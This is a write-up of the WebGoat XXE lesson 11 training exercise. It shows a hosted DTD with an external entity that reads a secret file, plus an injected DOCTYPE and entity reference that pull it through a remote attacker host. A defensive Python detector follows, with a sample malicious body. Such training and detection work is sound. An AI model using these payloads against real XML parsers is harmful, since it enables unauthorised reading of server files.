
This lesson is about XXE through a remotely hosted DTD: the goal is to read the file located at /home/webgoat/.webgoat-8.1.0/XXE/secret.txt and submit its content as a comment on the lesson form.

Let’s start by writing a comment

In Burp the request contains our comment, as expected, and the response tells us that the solution is, of course, not correct.

First things first, let’s create a DTD file (I will call it attackl11.dtd) that declares an entity pointing at the requested secret.txt file:
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY secret SYSTEM 'file:///home/webgoat/.webgoat-8.1.0//XXE/secret.txt'>
Then upload this attackl11.dtd to WebWolf

and get its URL from the WebGoat “link” highlighted here in red.

Next, send the request to Burp Repeater and start injecting XML.

Add the DOCTYPE declaration containing an ENTITY that points at our malicious DTD file, plus a reference to the &secret; ENTITY declared inside that DTD, then send the request.

When the comment is processed, the application fetches the malicious DTD file from the attacker machine, as the WebWolf screenshot shows.

Following the entity declaration in that DTD, the web app then reads the content of the secret.txt file we are interested in and places it in the comment exactly where the &secret; reference was put in the HTTP request.

Then just submit the secret.txt content as a plain comment and the lesson is completed.
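As an added defensive example (not part of the original writeup, nor WebGoat's own code), here is the server-side view of the two pieces above, the hosted DTD and the injected DOCTYPE with its &secret; reference: a Python check that flags the building blocks of this chain in an incoming XML comment body and refuses to parse it. The `<comment><text>` layout of the body, the attacker-webwolf.invalid host name and the function names are assumptions made for this example.

```python
import re
import xml.etree.ElementTree as ET

# Each indicator corresponds to one building block of the chain described
# above: a DOCTYPE, an external (SYSTEM/PUBLIC) entity declaration, a
# parameter-entity reference (%name;) that pulls the hosted DTD in, a remote
# or file:// URI inside the DTD, and a general entity reference (&secret;)
# that was never declared inline.
_DOCTYPE = re.compile(r"<!DOCTYPE", re.IGNORECASE)
_EXTERNAL_ENTITY = re.compile(r"<!ENTITY\s+%?\s*\w+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)
_PARAM_ENTITY_REF = re.compile(r"%\w+;")
_FILE_URI = re.compile(r"file://", re.IGNORECASE)
_REMOTE_URI = re.compile(r"(?:https?|ftp)://", re.IGNORECASE)
# &name; that is not one of XML's five predefined entities or a character reference
_UNDECLARED_REF = re.compile(
    r"&(?!(?:amp|lt|gt|quot|apos|#[0-9]+|#x[0-9A-Fa-f]+);)[A-Za-z_][\w.\-]*;"
)


def doctype_region(body: str) -> str:
    """Return the DOCTYPE declaration (including its internal subset, if any)."""
    m = _DOCTYPE.search(body)
    if not m:
        return ""
    rest = body[m.start():]
    subset_end = rest.find("]>")          # DOCTYPE with an internal subset
    if subset_end != -1:
        return rest[: subset_end + 2]
    simple_end = rest.find(">")           # DOCTYPE without a subset
    return rest if simple_end == -1 else rest[: simple_end + 1]


def find_xxe_indicators(body: str) -> list:
    """Names of the XXE indicators present in an XML request body, sorted."""
    hits = set()
    region = doctype_region(body)
    if region:
        hits.add("doctype")
        if _EXTERNAL_ENTITY.search(region):
            hits.add("external_entity")
        if _PARAM_ENTITY_REF.search(region):
            hits.add("parameter_entity_ref")
        if _FILE_URI.search(region):
            hits.add("file_uri")
        if _REMOTE_URI.search(region):
            hits.add("remote_dtd")
    # Entity references are checked over the whole body: the &secret;
    # placeholder sits in the comment text, outside the DOCTYPE.
    if _UNDECLARED_REF.search(body):
        hits.add("undeclared_entity_ref")
    return sorted(hits)


def is_safe_comment(body: str) -> bool:
    """True when no indicator of external DTD / entity processing is present."""
    return not find_xxe_indicators(body)


def parse_comment_safely(body: str) -> str:
    """Reject anything carrying XXE indicators, otherwise return the <text> value."""
    hits = find_xxe_indicators(body)
    if hits:
        raise ValueError("XML comment rejected: " + ", ".join(hits))
    root = ET.fromstring(body)
    node = root.find("text")
    if node is None or node.text is None:
        return ""
    return node.text


# Constructed sample bodies (assumed element layout and host name).
BENIGN_COMMENT = (
    '<?xml version="1.0"?>'
    "<comment><text>Nice lesson &amp; thanks</text></comment>"
)
XXE_COMMENT = (
    '<?xml version="1.0"?>'
    "<!DOCTYPE comment ["
    ' <!ENTITY % remote SYSTEM "http://attacker-webwolf.invalid/attackl11.dtd">'
    " %remote;"
    "]>"
    "<comment><text>&secret;</text></comment>"
)

if __name__ == "__main__":
    print("benign  ->", find_xxe_indicators(BENIGN_COMMENT), parse_comment_safely(BENIGN_COMMENT))
    print("xxe     ->", find_xxe_indicators(XXE_COMMENT))
```

This is a compensating control, useful as a logging or WAF rule; the real fix is to configure the XML parser to refuse DOCTYPE declarations and external entities altogether (in Java, for instance, the `disallow-doctype-decl` feature on DocumentBuilderFactory), at which point the request in this lesson fails before any DTD is fetched or any file is read.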
This concludes WebGoat XXE 11
I hope you liked it.
PVXs — https://twitter.com/pivixih